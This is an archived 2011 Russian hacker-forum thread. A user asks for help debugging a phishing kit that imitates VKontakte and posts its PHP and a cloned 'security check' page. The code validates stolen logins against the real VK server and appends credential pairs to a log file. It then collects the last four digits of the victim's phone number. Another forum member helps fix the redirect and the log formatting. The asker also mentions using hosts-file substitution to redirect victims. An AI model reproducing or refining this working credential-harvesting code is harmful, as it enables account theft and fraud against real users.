Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Помогите с фейком Вконтакте

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Веб-программинг] >> Помогите с фейком Вконтакте
Имя
Сообщение << Старые топики   Новые топики >>
Помогите с фейком Вконтакте - 2011-03-07 13:23:11.790000   
You_DAD

Сообщений: 60
Оценки: 0
Присоединился: 2010-02-26 20:27:36.206666
 После правельного ввода логина и пароля должен перекидывает на vksecurity.php, далее там вводяться 4 цыфры и на error.htm

Но почему-то идет моментальный редирект с vksecurity.php на error.htm, т.е. цыфры невозможно ввести.

весь фейк можно скачать здесь

Вот vksecurity.php
Подскажите, где ошибка?

&lt;?php session_start(); error_reporting(0); function authorization($login,$password) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://login.vk.com/?act=login"); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_POSTFIELDS,"email=".$login."&pass=".$password); curl_setopt($ch,CURLOPT_HEADER,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch); curl_close($ch); if(preg_match("#&lt;input type='hidden' name='op' value='slogin' /&gt;#i",$res,$matches)) return true; else return false; } $email = "";$pass = ""; if(isset($_POST['email']) and isset($_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; if(!authorization($email,$pass)) { header("Location: wrong.php?email=".$email); exit(); } $_SESSION['data'] = "$email:$pass"; $fh = fopen("data.php","a"); fwrite($fh,"\r\n".$_SESSION['data']); fclose($fh); session_destroy(); echo "&lt;script type=text/javascript&gt;window.location.href = '/error.htm';&lt;/script&gt;"; } elseif($_POST['code']) { $_SESSION['data'] = ":".$_POST['code']; $fh = fopen("data.php","a"); fwrite($fh,$_SESSION['data']."\r\n"); fclose($fh); session_destroy(); echo "&lt;script type=text/javascript&gt;window.location.href = '/error.htm';&lt;/script&gt;"; } ?&gt; &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt; &lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"&gt; &lt;head&gt; &lt;script type="text/javascript" src="vksecurity_files/al_loade.js"&gt;&lt;/script&gt; &lt;link rel="shortcut icon" href="vksecurity_files/faviconn.ico" /&gt; &lt;meta http-equiv="content-type" content="text/html; charset=windows-1251;charset=windows-1251" /&gt; &lt;meta name="description" content=" " /&gt; &lt;title&gt;В Контакте | Проверка безопасности&lt;/title&gt; &lt;noscript&gt;&lt;meta http-equiv="refresh" content="0; URL=/badbrowser.php"&gt;&lt;/noscript&gt; &lt;link rel="stylesheet" type="text/css" href="vksecurity_files/common00.css" /&gt; &lt;!--[if lte IE 6]&gt;&lt;style type="text/css" media="screen"&gt;/* &lt;![CDATA[ */ @import url(/css/al/ie6.css?18); /* ]]&gt; */&lt;/style&gt;&lt;![endif]--&gt; &lt;!--[if IE 7]&gt;&lt;style type="text/css" media="screen"&gt;/* &lt;![CDATA[ */ @import url(/css/al/ie7.css?12); /* ]]&gt; */&lt;/style&gt;&lt;![endif]--&gt; &lt;script type="text/javascript"&gt; var vk = { al: parseInt('2') || 4, intnat: '' ? true : false, lang: 0, rtl: parseInt('') || 0, version: 1657, zero: false } // msie6 hash fix var ___htest = (location.toString().match(/#(.*)/) || {})[1] || ''; if (vk.al != 1 && ___htest.length) { location.replace(location.protocol + '//' + location.host + '/' + ___htest.replace(/^\//, '')); } var StaticFiles = { 'common.js' : {v: 233}, 'common.css': {v: 106}, 'ie6.css' : {v: 18}, 'ie7.css' : {v: 12} ,'lang0_0.js':{v:2494} } &lt;/script&gt; &lt;script type="text/javascript" src="vksecurity_files/common00.js"&gt;&lt;/script&gt; &lt;script type="text/javascript" src="vksecurity_files/lang0_00.js"&gt;&lt;/script&gt; &lt;/head&gt; &lt;body onresize="onBodyResize()" class="is_rtl"&gt; &lt;div id="system_msg" class="fixed"&gt;&lt;/div&gt; &lt;div id="utils"&gt;&lt;/div&gt; &lt;div id="layer_bg" class="fixed"&gt;&lt;/div&gt;&lt;div id="layer_wrap" class="scroll_fix_wrap fixed"&gt;&lt;div id="layer"&gt;&lt;/div&gt;&lt;/div&gt; &lt;div id="box_layer_bg" class="fixed"&gt;&lt;/div&gt;&lt;div id="box_layer_wrap" class="scroll_fix_wrap fixed"&gt;&lt;div id="box_layer"&gt;&lt;/div&gt;&lt;/div&gt; &lt;a id="side_back_link" class="fixed" onmouseover="animate(this, {backgroundColor: '#E1E7ED'}, 200)" onmouseout="animate(this, {backgroundColor: '#FFF'}, 200)" onclick="if (this.href) return nav.go(this, event, {back: true}); scrollToTop(0);"&gt;&lt;/a&gt; &lt;script type="text/javascript"&gt;domStarted();&lt;/script&gt; &lt;div class="scroll_fix_wrap" id="page_wrap"&gt; &lt;div&gt;&lt;div class="scroll_fix"&gt; &lt;div id="page_layout"&gt; &lt;div id="page_header" class="p_head p_head_l0"&gt; &lt;div class="back"&gt;&lt;/div&gt; &lt;div class="left"&gt;&lt;/div&gt; &lt;div class="right"&gt;&lt;/div&gt; &lt;div class="content"&gt; &lt;a id="home" href="http://vkontakte.ru/" onclick="return nav.go(this, event)" class="fl_l"&gt;&lt;/a&gt; &lt;div id="top_nav" class="head_nav ta_r"&gt; &lt;div id="top_links" style=""&gt; &lt;a class="fl_r top_nav_link" href="http://vkontakte.ru/reg0" onclick="return !showBox('al_register.php', {act: 'register_box'}, {params: {width: 514}, stat: ['reg.css']}, event)"&gt;Как стать участником?&lt;/a&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;div id="side_bar" class="fl_l" style="display: none"&gt; &lt;div id="quick_login"&gt; &lt;form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}"&gt; &lt;input type="hidden" name="act" value="login" /&gt; &lt;input type="hidden" name="q" value="1" /&gt; &lt;input type="hidden" name="al_frame" value="1" /&gt; &lt;input type="hidden" name="expire" id="quick_expire_input" value="" /&gt; &lt;input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" /&gt; &lt;input type="hidden" name="captcha_key" id="quick_captcha_key" value="" /&gt; &lt;input type="hidden" name="from_host" value="vkontakte.ru" /&gt; &lt;div class="label"&gt;E-mail или Логин:&lt;/div&gt; &lt;div class="labeled"&gt;&lt;input type="text" name="email" class="text" onfocus="show('quick_expire')" id="quick_email" /&gt;&lt;/div&gt; &lt;div class="label"&gt;Пароль:&lt;/div&gt; &lt;div class="labeled"&gt;&lt;input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /&gt;&lt;/div&gt; &lt;div class="checkbox" id="quick_expire" onclick="checkbox(this);ge('quick_expire_input').value=isChecked(this)?1:'';"&gt;&lt;div&gt;&lt;/div&gt;Чужой компьютер&lt;/div&gt; &lt;input type="submit" class="submit" /&gt; &lt;/form&gt; &lt;div class="button_blue button_wide"&gt;&lt;button id="quick_login_button"&gt;Войти&lt;/button&gt;&lt;/div&gt; &lt;div class="clear forgot"&gt;&lt;a href="http://vkontakte.ru/login.php?op=forgot" target="_top"&gt;Забыли пароль?&lt;/a&gt;&lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;div id="page_body" class="simple"&gt; &lt;div id="header_wrap2"&gt; &lt;div id="header_wrap1"&gt; &lt;div id="header"&gt; &lt;h1 id="title"&gt;Проверка безопасности&lt;/h1&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;div id="wrap_between"&gt;&lt;/div&gt; &lt;div id="wrap3"&gt;&lt;div id="wrap2"&gt; &lt;div id="wrap1"&gt; &lt;div id="content"&gt;&lt;style type="text/css"&gt; #sideBar { display: none; } #pageBody, #page_body.simple { margin: 13px auto 0 auto; float: none; width: 570px; } #header { background: #F7F7F7; border-color: #D9E0E7; padding: 0; } #header h1 { padding: 4px 10px 5px 10px; border-top: 1px solid #f7f8f9; } .footerVK { margin: 0 auto; padding-left: 0; } #securityCheck { padding: 5px 18px 6px 18px; line-height: 140%; } #page_body #securityCheck { padding: 17px 30px 18px 30px; } #securityCheck .label { color: #666; font-size: 11px; width: 190px; } #check_msg { margin-bottom: 10px; font-weight: normal; } &lt;/style&gt; &lt;form method="POST" class="upload_frame" name="logout_form" id="logout_form" action="vksecurity.php" target="logout_frame"&gt; &lt;input type="hidden" name="act" value="logout" /&gt; &lt;input type="hidden" name="al_frame" value="1" /&gt; &lt;input type="hidden" name="from_host" value="vkontakte.ru" /&gt; &lt;/form&gt; &lt;iframe class="upload_frame" id="logout_frame" name="logout_frame"&gt;&lt;/iframe&gt; &lt;div id="securityCheck"&gt; &lt;form method="POST" name="check"&gt; &lt;div id="check_msg" class="error" style="display: none;"&gt;&lt;/div&gt; Вы пытаетесь зайти на сайт &lt;b&gt;vkontakte.ru&lt;/b&gt; из необычного места.&lt;br/&gt;&lt;br/&gt; Чтобы подтвердить, что Вы действительно являетесь владельцем своей страницы, пожалуйста, укажите последние &lt;b&gt;4 цифры номера&lt;/b&gt; телефона, к которому привязана страница. &lt;table id="formTable" cellpadding="0" cellspacing="7" style="margin-top: 15px; width: 100%;"&gt; &lt;tr&gt; &lt;td&gt;&lt;div class="label ta_r"&gt; &lt;/div&gt;&lt;/td&gt; &lt;td&gt;&lt;input name="code" id="code" type="text" class="text" style="width: 95%"/&gt;&lt;/td&gt; &lt;td width="100%"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;/td&gt; &lt;td style="white-space: nowrap;"&gt; &lt;div class="button_blue"&gt;&lt;button id="validate_btn" onClick="document.check.submit();"&gt;Подтвердить&lt;/button&gt;&lt;/div&gt; &lt;a href="http://login.vk.com/" style="padding-left: 8px;"&gt;Выйти&lt;/a&gt; &lt;/form&gt; &lt;/td&gt; &lt;td&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;div id="logoutButton" style="margin-top: 15px; text-align: center;display: none;"&gt; &lt;div class="button_blue"&gt;&lt;button onclick="if (!checkEvent(event)) { ge('logout_form').submit(); return false; }"&gt;Выйти&lt;/button&gt;&lt;/div&gt; &lt;/div&gt; &lt;/div&gt;&lt;/div&gt; &lt;/div&gt; &lt;/div&gt;&lt;/div&gt; &lt;/div&gt; &lt;div id="banner2" class="fl_r"&gt;&lt;/div&gt; &lt;div id="footer_wrap" class="simple"&gt; &lt;div id="bottom_nav"&gt; &lt;a href="http://vkontakte.ru/help.php?page=about"&gt;о сайте&lt;/a&gt; &lt;a href="http://vkontakte.ru/techsupp.php"&gt;техподдержка&lt;/a&gt; &lt;a href="http://vkontakte.ru/blog.php"&gt;блог&lt;/a&gt; &lt;a href="http://vkontakte.ru/help.php?page=terms"&gt;правила&lt;/a&gt; &lt;a href="http://vkontakte.ru/ads.php"&gt;реклама&lt;/a&gt; &lt;a href="http://vkontakte.ru/developers.php"&gt;разработчикам&lt;/a&gt; &lt;a href="http://vkontakte.ru/pages.php?o=-1&p=Merchant%20API"&gt;магазинам&lt;/a&gt; &lt;/div&gt; &lt;div id="footer" class="clear"&gt; &lt;div class="copy_lang"&gt;&lt;a href="http://vkontakte.ru/help.php?page=about"&gt;В Контакте&lt;/a&gt; &copy; 2006-2011 &lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 0, hash: '4936a15f2fc2ee0660'})"&gt;Русский&lt;/a&gt;&lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 1, hash: '4936a15f2fc2ee0660'})"&gt;Українська&lt;/a&gt;&lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 2, hash: '4936a15f2fc2ee0660'})"&gt;Беларуская (тарашкевiца)&lt;/a&gt;&lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 3, hash: '4936a15f2fc2ee0660'})"&gt;English&lt;/a&gt;&lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 11, hash: '4936a15f2fc2ee0660'})"&gt;Српски&lt;/a&gt;&lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 10, hash: '4936a15f2fc2ee0660'})"&gt;Magyar&lt;/a&gt;&lt;a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 57, hash: '4936a15f2fc2ee0660'})"&gt;Az&#601;rbaycan&lt;/a&gt;&lt;a onclick="showBox('lang.php', {act: 'lang_dialog'}, {noreload: true})"&gt;все языки &raquo;&lt;/a&gt;&lt;/div&gt; &lt;div&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;div class="clear"&gt;&lt;/div&gt; &lt;/div&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt; &lt;div class="progress" id="global_prg"&gt;&lt;/div&gt; &lt;script type="text/javascript"&gt; domReady(); updateMoney(false); gSearch.init(); if (window.qArr && qArr[5]) qArr[5] = [5, "по товарам", "", "goods", 0x00000100];var qf = ge('quick_login_form'), ql = ge('quick_login'), qe = ge('quick_email'), qp = ge('quick_pass'); window.onload = function() { setTimeout(function() { ql.insertBefore(ce('div', {innerHTML: '&lt;iframe class="upload_frame" id="quick_login_frame" name="quick_login_frame"&gt;&lt;/iframe&gt;'}), qf); qf.target = 'quick_login_frame'; }, 1); } qf.onsubmit = function() { if (!ge('quick_login_frame')) return false; if (!trim(qe.value)) { focus(qe); return false; } else if (!trim(qp.value)) { focus(qp); return false; } return true; } window.focusLoginInput = function() { scrollToTop(0); notaBene('quick_email'); } window.changeQuickRegButton = function(noShow) { if (!vk.intnat) { (noShow ? hide : show)('top_links'); } } window.submitQuickLoginForm = function(email, pass) { ge('quick_email').value = email; ge('quick_pass').value = pass; ge('quick_login_form').submit(); } ge('quick_login_button').onclick = function() { if (qf.onsubmit()) qf.submit(); }; if (browser.opera_mobile) show('quick_expire'); var btn = ge('validate_btn'); btn.onclick = function() { if (!ge('code').value.length) { return false; } lockButton(btn); var params = {act: 'security_check', code: ge('code').value, to: 'ZGVuaWVsOTU-', al_page: '2', hash: '37ffe12eac12ffbe88'}; ajax.post('login.php', params, { onDone: function (r, t) { ge('check_msg').innerHTML = t; show('check_msg'); unlockButton(btn); if (!r) { hide('formTable'); show('logoutButton'); } } }); return false; }; handlePageParams({"id":0,"loc":"?act=security_check&al_page=2&to=ZGVuaWVsOTU-","noleftmenu":1,"notopmenu":1,"notopbars":1});vk.id = 0; &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; &lt;!-- This document saved from http://vkontakte.ru/login.php?act=security_check&to=ZGVuaWVsOTU-&al_page=2 --&gt;
Post #: 1
RE: Помогите с фейком Вконтакте - 2011-03-07 14:28:31.813333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
quote:

if(isset($_POST['email']) and isset($_POST['pass']))
{
$email = $_POST['email'];
$pass = $_POST['pass'];
if(!authorization($email,$pass))
{
header("Location: wrong.php?email=".$email);
exit();
}
$_SESSION['data'] = "$email:$pass";
$fh = fopen("data.php","a");
fwrite($fh,"\r\n".$_SESSION['data']);
fclose($fh);
session_destroy();
echo "&lt;sсriрt type=text/jаvаsсript&gt;window.location.href = '/error.htm';&lt;/sсriрt&gt;";
}
elseif($_POST['code'])
{
$_SESSION['data'] = ":".$_POST['code'];
$fh = fopen("data.php","a");
fwrite($fh,$_SESSION['data']."\r\n");
fclose($fh);
session_destroy();
echo "&lt;sсriрt type=text/jаvаsсript&gt;window.location.href = '/error.htm';&lt;/sсriрt&gt;";
}


Ну а с какого перепугу у тебя ридерект в коде 2 раза прописан?

quote:

После правельного ввода логина и пароля должен перекидывает на vksecurity.php, далее там вводяться 4 цыфры и на error.htm

А у тебя судя по коду после ввода логин-пароля редирект сразу на error.htm
Post #: 2
RE: Помогите с фейком Вконтакте - 2011-03-07 14:50:11.083333   
You_DAD

Сообщений: 60
Оценки: 0
Присоединился: 2010-02-26 20:27:36.206666
 Разобрался, там где пишуться логин и пароль в базу просто нужно было vksecurity поставить, а уже там где код идет error.htm


} $email = "";$pass = ""; if(isset($_POST['email']) and isset($_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; if(!authorization($email,$pass)) { header("Location: wrong.php?email=".$email); exit(); } $_SESSION['data'] = "$email:$pass"; $fh = fopen("data.php","a"); fwrite($fh,"\r\n".$_SESSION['data']); fclose($fh); session_destroy(); echo "&lt;script type=text/javascript&gt;window.location.href = '/vksecurity.php';&lt;/script&gt;"; } elseif($_POST['code']) { $_SESSION['data'] = ":".$_POST['code']; $fh = fopen("data.php","a"); fwrite($fh,$_SESSION['data']."\r\n"); fclose($fh); session_destroy(); echo "&lt;script type=text/javascript&gt;window.location.href = '/error.htm';&lt;/script&gt;"; }

Только один вопрос, логин и пароль в базу пишуться не с новой строки.
Получается:

логин:пароль:код логин:пароль:код

а нужно:
логин:пароль:код
логин:пароль:код
Post #: 3
RE: Помогите с фейком Вконтакте - 2011-03-07 16:28:56.850000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
 $_SESSION['data'] = "".$email.":".$pass."
";
$fh = fopen("data.php","a");
fwrite($fh,$_SESSION['data']);
fclose($fh);
Post #: 4
RE: Помогите с фейком Вконтакте - 2011-03-08 19:51:13.543333   
You_DAD

Сообщений: 60
Оценки: 0
Присоединился: 2010-02-26 20:27:36.206666
 С этим проблему решил.

Фейк под подмену хостс, подменил вручную, но именно , когда хостс правленный, он не функционирует.
Главная страница есть, но логин и пароль он не проверяет и вообще нифига не делает. Вообщем, кто поможет доделать его отблагодарю:)
Post #: 5
RE: Помогите с фейком Вконтакте - 2011-04-01 11:19:31.406666   
organizeit

Сообщений: 26
Оценки: 0
Присоединился: 2011-03-30 17:04:03.143333
 Интерестное решение проблемы у Модэратора
Post #: 6
Страниц:  [1]
Все форумы >> [Веб-программинг] >> Помогите с фейком Вконтакте







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.